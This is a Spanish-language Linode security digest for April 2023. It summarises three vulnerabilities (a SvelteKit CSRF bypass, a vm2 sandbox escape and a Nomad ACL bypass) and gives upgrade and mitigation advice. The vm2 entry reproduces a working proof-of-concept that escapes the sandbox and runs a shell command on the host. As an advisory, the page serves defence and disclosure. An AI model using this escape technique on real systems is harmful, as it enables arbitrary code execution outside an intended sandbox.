Ir al contenido principal
Ver todos los productos
Calcular
Almacenamiento
Bases de datos
Conexión
Herramientas para desarrolladores
Distribución
Seguridad
Servicios
Sectores
Precios
Comunidad
Habla con nosotros
Explorar el blog
Categorías
13
  1. Panorama de la nube
    51
  2. Calcular
    24
  3. Contenedores (Kubernetes, Docker)
    34
  4. Bases de datos
    21
  5. Herramientas para desarrolladores
    41
  6. Linode
    259
  7. Linux
    69
  8. Multicloud
    4
  9. Conexión
    32
  10. Código Abierto
    6
  11. Red de socios
    7
  12. Seguridad
    60
  13. Almacenamiento
    23
Autores 55
  1. Alex Leung 2
  2. Abe Massry 2
  3. Al Newkirk 1
  4. Alexander Newnham 2
  5. Andrew Sauber 1
  6. Andrew Stebbins 2
  7. Andy Stevens 5
  8. Ari Weil 1
  9. Bradley LaBoon 1
  10. Blair Lyon 9
  11. Billy Thompson 10
  12. Christopher Aker 175
  13. Cassie Bubnis 1
  14. Daniele Polencic 4
  15. David Monschein 2
  16. Dan Spataro 2
  17. Elvis Segura 1
  18. Gardiner Bryant 1
  19. Holden Morris 4
  20. Hillary Wilmoth 67
  21. Jim Ackley 6
  22. Jessica Capuano Mora 5
  23. Justin Cobbett 6
  24. Jon Frederickson 1
  25. Jonathan Hill 2
  26. Justin Mitchel 4
  27. James Steel 5
  28. Jamie Sherkness 8
  29. Linode 68
  30. Linode Events 8
  31. The Linode Security Team 122
  32. The Linode Network & Security Teams 1
  33. LINQ 1
  34. Leslie Salazar 1
  35. Michelle Berg 1
  36. Mitch Donaberger 1
  37. Mike Fischler 1
  38. Mike Maney 10
  39. Maddie Presland 19
  40. Mike Quatrani 4
  41. Nathan Melehan 2
  42. Nigel Poulton 1
  43. Prasoon Pushkar 1
  44. Rick Myers 7
  45. Richard Tubb 1
  46. Sal Carrasco 1
  47. Salman Iqbal 1
  48. Stuart Macleod 1
  49. Shawn Michels 1
  50. Linode Support 14
  51. Tom Asaro 18
  52. Travis Baka 2
  53. Talia Nassi 12
  54. Tim Vereecke 1
  55. Yuri Goldfeld 1
BlogSeguridadLinode Dosier de seguridad del 10 de abril al 17 de abril de 2023

Linode Security Digest 10 de abril-17 de abril de 2023

Linode
El equipo de seguridad de Linode
14 de abril de 2023
Linode Security Digest

En el resumen de esta semana hablaremos de lo siguiente:

  • Evasión de la protección CSRF en SvelteKit;
  • Un escape sandbox en versión vm2; y 
  • Una omisión de autorización ACL no autenticada para HashiCorp Nomad y Nomad Enterprise que resulta en una escalada de privilegios.
CVE-2023-29003: SvelteKit: Anulación de la protección CSRF mediante el encabezado Content-Type

Fondo

SvelteKit es un marco de trabajo para crear aplicaciones web utilizando la biblioteca Svelte JavaScript. Proporciona una experiencia de desarrollo optimizada al incluir funciones como el renderizado del lado del servidor, el enrutamiento y el enrutamiento de páginas basado en archivos.

Vulnerabilidad

La vulnerabilidad, CVE-2023-29003, afecta a las versiones de SvelteKit inferiores a la 1.15.1 debido a la insuficiente protección contra falsificaciones de petición en sitios cruzados (CSRF). Antes de SvelteKit 1.15.1, la protección CSRF se ejecutaba cuando se cumplían tres condiciones: (1) la petición era un POST, (2) había un desajuste entre el origen del sitio y la cabecera HTTP de origen de la petición, y (3) si la petición incluía contenido de formulario, indicado por una cabecera Content-Type de "application/x-www-form-urlencoded" o "multipart/form-data". 

Si se cumplieran todas estas condiciones, se enviaría una respuesta 403 Forbidden a la petición. Esta comprobación podría eludirse utilizando un Content-Type diferente en la petición, como "text/plain".

Mitigación

  • La vulnerabilidad se ha solucionado en la versión 1.15.1 de SvelteKit. Se recomienda actualizar a la última versión para solucionar este problema.
CVE-2023-29199: vm2: Sandbox Escape en el transformador de código fuente

Fondo

vm2 es un módulo de Node.js que proporciona un entorno aislado para ejecutar código no fiable de forma segura. Permite crear contextos de ejecución aislados en los que los atacantes pueden ejecutar código no fiable sin poder acceder al contexto global ni a datos sensibles.

Vulnerabilidad

La vulnerabilidad se basa en una excepción en la lógica de saneamiento del transformador de código fuente de vm2. Esta vulnerabilidad permite a un atacante saltarse la función handleException() y filtrar excepciones del host no saneadas abriendo la puerta a que un atacante escape del sandbox y ejecute código arbitrario en el contexto del host.

El usuario de GitHub leesh3288 hizo una prueba de concepto para explotar esta vulnerabilidad, que muestra la facilidad con la que se puede ejecutar código en el contexto del host:

const {VM} = require("vm2");
const vm = new VM();

const code = `
aVM2_INTERNAL_TMPNAME = {};
function stack() {
    new Error().stack;
    stack();
}
try {
    stack();
} catch (a$tmpname) {
    a$tmpname
        .constructor
        .constructor('return process')()
        .mainModule.require('child_process')
        .execSync('touch pwned');
}
`

console.log(vm.run(code));

Mitigación

  • La vulnerabilidad se ha solucionado en la versión 3.9.16 de vm2. Se recomienda actualizar a la última versión para solucionar este problema.
CVE-2023-1782: HashiCorp Nomad: Escalada de privilegios por elusión de ACL no autenticada

Fondo

HashiCorp Nomad es una plataforma de orquestación de contenedores que permite a los usuarios desplegar y gestionar fácilmente aplicaciones en diversos entornos, como centros de datos, la nube y ubicaciones periféricas. Ofrece funciones como despliegue automatizado, escalado y autorreparación, así como compatibilidad con múltiples tiempos de ejecución de contenedores y algoritmos de programación.

Vulnerabilidad

No hay muchos detalles específicos sobre esta vulnerabilidad. Sin embargo, según el informe del investigador, las solicitudes HTTP no autenticadas pueden eludir las autorizaciones ACL previstas siempre que se procese una solicitud en el servidor a través de RPC internas. Esta vulnerabilidad afecta a HashiCorp Nomad y HashiCorp Nomad Enterprise para las versiones 1.5.0 hasta 1.5.2.

Mitigación

  • Esta vulnerabilidad puede remediarse habilitando mTLS en su clúster de hosts.
  • Esta vulnerabilidad se ha solucionado en la versión 1.5.3 de HashiCorp Nomad. Se recomienda actualizar a la última versión para solucionar este problema. 

También te puede gustar...

Automatización del cumplimiento con Harry.

Explicación de las herramientas de automatización del cumplimiento | Protección de datos y clientes

En este vídeo, Harry explica la importancia de la automatización del cumplimiento y muestra cómo utilizar herramientas de automatización del cumplimiento como Chef.
Seguridad
Cómo protegerse de los ataques de ransomware con Steve Winterfeld, imagen destacada.

Cómo protegerse de los ataques de ransomware | Steve Winterfeld, Akamai

En este vídeo, Steve Winterfeld, CISO asesor de Akamai, comparte consejos sobre cómo pueden protegerse las empresas de los ataques de ransomware.
Seguridad
Wazuh es una central de ciberseguridad que ofrece Code with Harry.

Wazuh es un centro neurálgico de ciberseguridad | Expertos en seguridad de código abierto Monitoring & Response

@CodeWithHarry cubre Wazuh, una plataforma de seguridad de código abierto utilizada para recopilar y analizar datos de seguridad.
Seguridad

Comentarios

Dejar una respuesta

Su dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *.